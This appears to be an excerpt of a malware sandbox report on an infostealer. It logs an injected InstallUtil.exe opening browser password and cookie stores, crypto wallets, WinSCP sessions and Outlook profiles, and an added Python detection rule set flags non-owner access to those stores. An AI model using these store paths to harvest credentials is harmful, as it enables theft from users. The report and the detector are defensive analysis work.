Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: InstallUtil.exe, 00000009.00000002.1450013749.00000000007C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectronCash@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jaxx L4
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q7C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q4C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Exodus@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q@C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q9C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1410025378.0000000007810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1617686351.0000000003324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
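The file and registry opens listed in this section are the evidence behind the browser, wallet, WinSCP and mail-credential signatures: a .NET framework utility (InstallUtil.exe, here hosting the injected payload) opening Chrome and Edge Login Data, Web Data, Cookies and History, Firefox key4.db, cookies.sqlite and places.sqlite, the Bitcoin-Qt and WinSCP session keys, and the Outlook profile key. The Python below is an added detection example, not code from the report: it runs a small owner-allowlist rule set over file/registry access events and flags any process other than the store's own application touching one of these stores. The events are constructed for the demonstration from the paths and keys above plus two benign events; the owner image names in RULES are assumptions that need tuning per environment (backup agents and browser updaters also read these files).

```python
"""Flag credential-store access by processes other than the store's owning application.

Added example; not code from the sandbox report.  SAMPLE_EVENTS is constructed for the
demonstration from the paths and keys the report lists, plus two benign events; the owner
image names in RULES are assumptions to tune per environment.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessEvent:
    process: str  # image path of the process that opened the object
    target: str   # file path or registry key that was opened


# (category, regex over the lower-cased target, image names allowed to touch it).
# History and places.sqlite are browsing history rather than credentials, but the report
# lists them with the credential stores, so they share the browser rule.
RULES = [
    ("browser-data",
     r"\\(google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\(login data|web data|history|network\\cookies)$",
     {"chrome.exe", "msedge.exe"}),
    ("browser-data",
     r"\\mozilla\\firefox\\profiles\\[^\\]+\\(key4\.db|cookies\.sqlite|places\.sqlite)$",
     {"firefox.exe"}),
    ("crypto-wallet",
     r"^hkey_current_user\\software\\bitcoin\\bitcoin-qt$",
     {"bitcoin-qt.exe"}),
    ("scp-client-sessions",
     r"^hkey_current_user\\software\\martin prikryl\\winscp 2\\sessions$",
     {"winscp.exe"}),
    ("mail-profile",
     r"\\windows messaging subsystem\\profiles\\outlook\\",
     {"outlook.exe"}),
]
_COMPILED = [(cat, re.compile(pat), owners) for cat, pat, owners in RULES]


def image_name(process_path: str) -> str:
    """Last path component of the process image, lower-cased for comparison."""
    return process_path.rsplit("\\", 1)[-1].lower()


def flag_credential_access(events):
    """Return (category, image, target) for each event where a non-owner opens a store.

    Matching is on the lower-cased target; the first matching rule decides.  A copy of
    the store made elsewhere (the usual stealer trick) will not hit a path rule, so pair
    this with a copy/read rule on the same paths in production.
    """
    findings = []
    for ev in events:
        image = image_name(ev.process)
        target = ev.target.lower()
        for category, pattern, owners in _COMPILED:
            if pattern.search(target):
                if image not in owners:
                    findings.append((category, image, ev.target))
                break
    return findings


_IU = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
SAMPLE_EVENTS = [  # constructed for the demonstration
    AccessEvent(_IU, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(_IU, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db"),
    AccessEvent(_IU, r"HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt"),
    AccessEvent(_IU, r"HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"),
    AccessEvent(_IU, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    # benign: the browser itself reads its own store
    AccessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    # benign: a framework assembly, not a credential store
    AccessEvent(_IU, r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll"),
]

if __name__ == "__main__":
    for category, image, target in flag_credential_access(SAMPLE_EVENTS):
        print(f"{category:20} {image:16} {target}")
```

On the constructed events the first five are flagged with installutil.exe as the accessing image and the two benign ones are not. The rule set is deliberately keyed on the store paths the report shows rather than on the InstallUtil.exe image, since the same stealer family is seen hosted in other .NET utilities.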

Remote Access Functionality

Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR